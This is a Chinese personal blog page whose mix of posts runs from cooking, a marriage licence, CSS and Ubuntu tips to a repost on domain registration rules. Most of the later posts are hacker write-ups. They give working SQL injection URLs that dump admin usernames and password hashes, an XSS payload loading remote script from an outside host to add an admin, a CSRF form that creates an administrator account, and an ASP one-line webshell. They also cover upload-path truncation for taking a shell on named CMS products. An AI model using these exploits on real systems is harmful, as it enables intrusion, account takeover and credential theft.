自己做的干锅鸡
Posted by adminFeb 5
嘿嘿,想吃肉了,晒晒我自己做的干锅鸡图片。
因为是晚上,光线不好,有的照片用手电筒照了一下,唉,破手机,拍的就是不行。。。
上面这两张是刚炒出来鸡块的时候,很麻辣哦。然后接着加工,加了香菜,蘑菇,木耳,大豆芽,芹菜芽,豆腐叶,芝麻,辣椒。。。边吃边加热,麻辣鲜香,红红的汤,红红的辣椒,绿色的香菜,黄色的大豆芽,黑色的木耳,白色的蘑菇,芝麻,豆腐叶,嘎,还有金黄色的肉。。。好吃啊!
ime-mode:disabled css实现关闭文本框输入法
Posted by adminJan 30
ime-mode
语法:
ime-mode : auto | active | inactive | disabled
取值:
auto : 默认值。不影响IME的状态。与不指定 ime-mode 属性时相同
active : 指定所有使用IME输入的字符。即激活本地语言输入法。用户仍可以撤销激活IME
inactive : 指定所有不使用IME输入的字符。即激活非本地语言。用户仍可以撤销激活IME
disabled : 完全禁用IME。对于有焦点的控件(如输入框),用户不可以激活IME
领证了
Posted by adminJan 18
唉,结婚真累,本来想和老婆出去玩的,不过最近事好像特别多,搞的啥也玩不成了。。
今天去领证了,和想像中不同,服务态度不算好吧,一副爱理不理的样子,好像离婚的比结婚的多。。。
以前见过老爸老妈的是一张纸,现在拿到才知道是两个本本,一人一个。。。
两人合照一寸照片四张 20元
复印身份证 2元
结婚证手续费 9元
共销费31元。以后就不是单身了。。。已婚,好蛋疼的词。。。
最近处理婚后的锁事,把老婆的户口迁过来,接着学习冲电,努力工作赚钱。。
ubuntu自动挂载NTFS分区
Posted by adminDec 26
唉,不自动加载的话,用起来相当的麻烦。以下方法很简单。。
sudo apt-get install ntfs-config
sudo ntfs-config
国内域名注册服务停止对个人开放
Posted by adminDec 12
来源:月光博客 http://www.williamlong.info/archives/2018.html
FUCK,让人郁闷的消息,看来我转移到GODADDY是个正确的选择...
12月9日晚间,中央电视台《焦点访谈》就手机网络色情进行了系列访谈,晚间节目主题为《失控的域名》,指责工信部CNNIC对于域名的注册缺乏监管,域名注册服务过程中存在注册信息不真实、不准确、不完整的问题,要求其保证域名注册信息的真实性,严格执行实名制审查,并承担相应责任。
在遭到央视点名批评后,中国域名监管机构CNNIC处罚了三家域名注册服务及代理机构,并在官方网站接连发出数则加强域名注册信息审核工作的公告,而最新公告规定,从2009年12月14日上午9时起,个人用户没有资格进行域名注册。
该公告要求用户向域名注册服务机构在线提交域名注册申请的同时,应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表(原件)、企业营业执照或组织机构代码证(复印件)、注册联系人身份证明(复印件)。个人用户由于无法提供企业营业执照或组织机构代码证,因此也没有资格进行域名注册。这也意味着,个人用户在未来将无法在国内注册包括COM、NET、CN等在内的所有域名。
对于个人网站用户来说,我以前就说过不要在国内注册域名,现在是彻底无法在国内注册了,中国的域名注册服务辛辛苦苦发展了十多年,现在一夜回到解放前,在广电的强势进攻之下,工信部可谓一败涂地,现在连个人用户都无法在国内进行域名注册了,互联网的发展历史性的倒退了。
这样的要求除了让个人网站更难注册域名之外,还减少CNNIC自身的业务,可谓损人不利己。现在已经不是十年前了,各大银行的个人信用卡业务已经茁壮发展起来了,只要申请一张国际信用卡,就可以轻松在国外网站进行域名注册,注册填写的信息更加难以监管和监控,CNNIC还失去了对这些域名的控制权。
因此,现在还在使用国内域名注册服务的个人网站,应该充分认识到这方面存在的巨大不确定风险,尽快将域名转到国外,例如美国的注册商。美国是法制国家,域名注册商绝对不会出卖客户的隐私信息的,也不会违规取消客户的域名。因此,在美国注册域名安全、可靠、实惠,总的来说远远优于在国内域名注册服务。具体操作可参见这篇“万网域名转出攻略”。
新注册的个人网站用户,由于国内已经不允许个人注册域名,因此只能在国外注册,注册可参见我这篇“在国外进行国际域名注册”的攻略。
没有信用卡的用户,可以寻找一些代购服务,让有信用卡的用户代购,也可以做一些国外的广告,将收入接收到自己的PayPal帐号,然后使用PayPal支付域名费用。
附:CNNIC关于进一步加强域名注册信息审核工作的公告
为了提升域名注册信息的真实性、准确性、完整性,进一步加强域名注册信息审核工作,现通知如下要求:
1、用户向域名注册服务机构在线提交域名注册申请的同时,应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表(原件)、企业营业执照或组织机构代码证(复印件)、注册联系人身份证明(复印件)。
2、域名注册服务机构应当认真审核用户提交的书面申请材料,审核合格后,将书面申请材料通过传真或电子邮件的形式提交至我中心,并保留书面申请资料。
3、自域名提交在线申请之日起5日内我中心未收到书面申请材料的或域名申请材料审核不符合条件的,该域名将予以注销。
4、以上要求自2009年12月14日上午9时起施行。
中国互联网络信息中心 2009年12月11日
睛天电影系统 0DAY
Posted by adminOct 25
作者:st0p & My5t3ry
转载请注明出处http://www.st0p.org
唉,和My5t3ry搞出的洞,联系了官方管理员,一直没人理我。
首先说注入问题
漏洞文件为/p_inc/hits_order.asp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | <!--#include file="../p_inc/config.asp"--> <!--#include file="../p_inc/function.asp"--> <!--#include file="../p_inc/function_func.asp"--> <!--#include file="../p_inc/openconn.asp"--> <!--#include file="../p_inc/G_function.asp"--> <% IF Not ChkPost() Then response.Redirect G_error_page_1 response.End() End IF '这里调用了/p_inc/function.asp文件中ChkPost()函数检测来源网址 Function G_hitss(url,numb) Dim str str="" sql="select top "&numb&" id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" '看到了没numb没有过滤 Set rs=server.CreateObject(G_RS) rs.open sql,conn,1,1 i=1 Do While Not rs.Eof d_url=url_(Array("d",rs(0),url)) str=str&"<div class=kkk1_list><a class=bbb href="&d_url&" title='主演:"&rs(2)&"'>"&Get_length(rs(1),"",32)&"</a> ("&rs(3)&")</div>" i=i+1 rs.movenext Loop G_hitss=str End Function %> document.write("<%=G_hitss(request("url"),request("numb"))%>") '这里的numb也没有过滤 |
利用方法如
1、可以直接用软件伪造Referer后,访问如下地址实现
2、通过XMLHTTP实现伪造Referer,访问如下地址实现
http://www.st0p.org/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,
注:只要跳过去Referer的检测,就可以通过POST,GET,COOKIE的各种方式来实现注入了。。。
访问以下内容后,管理员用户名在网址的链接中,密码HASH直接显示出来了。。
破解密码HASH,因为后台可以直接编辑ASP文件,进入后台拿SHELL就行了。
这程序还有别的漏洞。这里就不发了。。
xss的高级利用
Posted by adminOct 14
作者:cnryan
来源:http://hi.baidu.com/cnryan
以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。
一 XSS下提升权限
随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。
用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭建了一个sdbook的留言本,因为sdbook没有对用户输入的变量作出合适的过滤,导致一个XSS的产生。
留言率先传递给管理员,当作javascript劫持,我们就可以利用管理员的权限做任何事情,例如添加一个管理员。
在留言内容输入跨站代码:
1 | <script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script> |
这段代码用来加载远程的JS,而xss.js的内容是利用xmlHttp对象发送一个异步请求,通过XMLHTTP无刷新提交到服务器端,模拟添加一个管理员。
Read the rest of this entry
尘缘雅境图文系统拿SHELL思路
Posted by adminOct 7
作者:st0p
转载请注明出处:http://www.st0p.org
其实尘缘雅境图文系统和我上次发的沸腾新闻系统是同一群人开发的,所以漏洞基本相同。。。
如何得到用户名和密码?
1、默认数据库路径没改,直接下载,得到用户名和密码,机会很小。
2、通过注入得到用户名和密码hash,破解hash还原密码,如果实在无法还原的情况下,你可以参考我的上篇文章(沸腾新闻系统 v0.45 拿 SHELL:http://www.st0p.org/blog/archives/boiling-news-system-v0-45-take-shell.html)的方法进行COOKIE欺骗。
3、直接注册用户为管理员,如果开放了注册的话,把下面代码保存为admin.htm,然后把action中的网址改成你对应的目标站就可以了。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title></title>
<meta name="author" content="st0p,st0p.org">
</head>
<body topmargin="0">
<form align="center" method="post" name="FrmAddLink" action="http://www.st0p.org/admin/saveuser.asp">
<div align="center">
<input name="username" value="st0p" type="hidden">
<input name="passwd" value="st0p.org" type="hidden">
<input name="passwd2" value="st0p.org" type="hidden">
<input name="question" value="st0p.org" type="hidden">
<input name="answer" value="st0p.org" type="hidden">
<input name="fullname" value="st0p.org" type="hidden">
<input name="depid" value="1" type="hidden">
<input name="sex" value="先生" type="hidden">
<input name="birthyear" value="1950" type="hidden">
<input name="birthmonth" value="1" type="hidden">
<input name="birthday" value="1" type="hidden">
<input name="tel" value="1234567" type="hidden">
<input name="email" value="webmaster@google.com" type="hidden">
<input name="photo" value="" type="hidden">
<input name="purview" type="hidden" value="99999">
<input name="oskey" type="hidden" value="super">
<input name="reglevel" type="hidden" value="1">
<input name="jingyong" type="hidden" value="0">
<input type="submit" value="添加管理员" name="cmdOk" class="buttonface" style="font-family: 宋体; font-size: 9pt;">
</p>
</div>
</form>
</body>
</html> |
添加成功后,我们直接用帐号:st0p 密码:st0p.org登陆后台就可以了。
当然不只以上的方法拿到管理员的信息,由于我们讨论的是拿SHELL的思路,所以如何得到管理员信息这里我们不多做研究。
如何拿到SHELL?
1、通过远程保存文件,当然这种情况适用于利用iis6,是利用iis6的一个BUG来实现的,具体你可以参考我的上篇文章(沸腾新闻系统 v0.45 拿 SHELL:http://www.st0p.org/blog/archives/boiling-news-system-v0-45-take-shell.html)中的方法拿SHELL
2、登陆后台发一篇文章,标题我们使用
1 | <%execute request("st0p")%> |
内容随意写,发表成功后,我们访问http://www.st0p.org/admin/createasp.asp,会提示首页调用ASP已经更新!这样我们就得到了了一句话的马了。。
地址为:http://www.st0p.org/lastnewsxp.asp,密码为st0p
3、还有一种是通过进入后台,在系统管理-->网站属性-->上传类型中添加脚本的类型的方法,本来我们应该可以添加如asp,php,aspx,cer,asa等等类型的,然后发表文章的时候直接上传脚本来实现的。不过程序中由于以下代码过滤了asp,aspx,asa,所以只有当支持CER,PHP或别的脚本类型时可以上传成功。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | fileExt=lcase(file.FileExt) Forumupload=split(UpFileType,"|") for i=0 to ubound(Forumupload) if fileEXT=trim(Forumupload(i)) then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then EnableUpload=false end if if EnableUpload=false then msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType founderr=true end if |
4、利用后台头像上传漏洞,通过NC截取来实现上传SHELL的目的。由于uploadfaceok.asp文件中可以自定义上传路径filepath参数,我们可以通过抓包修改filepath参数,实现截断文件名拿到SHELL,具体利用方法就不在这里发了,大家可以BAIDU一下关于NC上传的知识。重要部分的代码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 | ...... formPath=upload.form("filepath") if right(formPath,1)<>"/" then formPath=formPath&"/" ...... fileExt=lcase(getFileExtName(file.fileName)) if fileext<>"jpg" and fileext<>"png" and fileext<>"gif" and fileext<>"bmp" then response.write "<span style=""font-family: 宋体; font-size: 9pt"">该文件格式不允许上传 [ <a href=# onclick=history.go(-1)>重新上传</a> ]</span>" '检测了上传文件名的后缀,但没有检测上传路径是否非法 response.end end if randomize rannum=int(90000*rnd)+10000 filename=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileExt if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据 file.SaveAs Server.mappath(formPath &filename) '没有过滤就直接带入了formPath response.write "<script>parent.document.FrmAddLink.photo.value='uploadfile/face/"&FileName&"'</script>" end if ...... |
先总结到这吧,当然应该还有一些别的地方可以利用。但st0p没时间写了,还有事要做。。有空在接着添加吧。。
沸腾新闻系统 v0.45 拿 SHELL
Posted by adminSep 25
作者:st0p
转载请注明出处:http://www.st0p.org
看到群里的無材发来一站,打开看了一下,很像是沸腾新闻系统,不过版本写的是V0.1,网上没找到相应的版本,发现有1.1和0.45两个版本,记得在News.asp存在注入来着,试了一下,的确可以,不过因为版本不同,所以news表的字段不同,所有语句有点不同。
经过st0p的尝试,目标站应该是0.45的,通过以下语句成功得到后台用户名和密码HASH,我是试到27个字段时成功的。。
http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202
看到没,我们得到了用户名xcb,密码为c95ca278a74775f8,然后我们去破解MD5,郁闷,查不到,无法破解,难道无法进入后台来着。。。
然后我查看了一下0.45版的代码,发现了验证用户登陆的部分在admin/chkuser.asp中,我们看一下代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | < % IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN '首先检测cookies中的key,如果不为上面的值,自动转向登陆页面 response.redirect "login.asp" response.end END IF set urs=server.createobject("adodb.recordset") sql="select * from admin where username='"&Request.cookies("username")&"'" '查询cookies中username是否是管理用户 urs.open sql,conn,1,3 if urs.bof or urs.eof then response.redirect "login.asp" response.end end if IF Request.cookies("passwd")<>urs("passwd") THEN '如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向 response.redirect "login.asp" response.end END IF urs.close set urs=nothing %> |
嘿嘿,运气还真好,虽然无法破解密码HASH,但可以利用它实现欺骗。看利用过程。。 Read the rest of this entry
DEDECMS 小说连载模块 0DAY
Posted by adminSep 22
作者:st0p
可以转载,不过请注明出处http://www.st0p.org
由于这个洞出现在DEDECMS小说连载的模块中,所以只要DEDECMS安装时选小说连载模块,那么就存在这个问题,有些版本在条件允许下是可以直接拿SHELL的哦。
st0p总结了一下利用条件
条件1:当服务器的PHP设置magic_quotes_gpc = Off
条件2:目标DEDECMS系统安装时选中小说连载模块
首先我们先来看一下DEDECMS 5.1,他的小说频道和DEDECMS 5.3.1,DEDECMS 5.5不同,因为他的文件在member目录下面,文件是member/story_books.php,而DEDECMS 5.3.1和DEDECMS 5.5的文件在book目录下,文件是book/story_books.php
因为里面的代码相似,所以呢,咱们只看一个story_books.php就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | < ?php ...... if(!isset($action)) $action = ''; //检测变量$action是否存在,不存则则给初使值 if(!isset($catid)) $catid = 0; //检测变量$catid是否存在,不存则则给初使值 if(!isset($keyword)) $keyword = ""; //检测变量$keyword是否存在,不存则则给初使值 if(!isset($orderby)) $orderby = 0; //检测变量$orderby是否存在,不存则则给初使值 ...... if($catid!=0) $addquery .= " And (b.bcatid='$catid' Or b.catid='$catid') "; //变量$catid不为0时,就直接把$catid给$addquery了,没有验证 if($keyword!="") $addquery .= " And (b.bookname like '%$keyword%' Or b.author like '%$keyword%') "; //变量$keyword不为空时,就直接把$keyword给$addquery了,没有验证 $query = " Select b.id,b.catid,b.bookname,b.booktype,b.litpic,b.postnum,b.senddate,b.ischeck, c.id as cid,c.classname From #@__story_books b left join #@__story_catalog c on c.id = b.catid where memberid={$cfg_ml->M_ID} and b.id>0 $addquery $orderby "; //生成了语句 ...... ?> |
上面的代码看到了吧,嘎,catid和keyword没有过滤,所以这就引起了注入,不过好像构成语句有点麻烦,这个就不在本文的讨论了范围了,我们举个小例子试一下,以下操作请在登陆后进行测试,直接注册个帐号,登陆,然后输入以下地址就可以了
Read the rest of this entry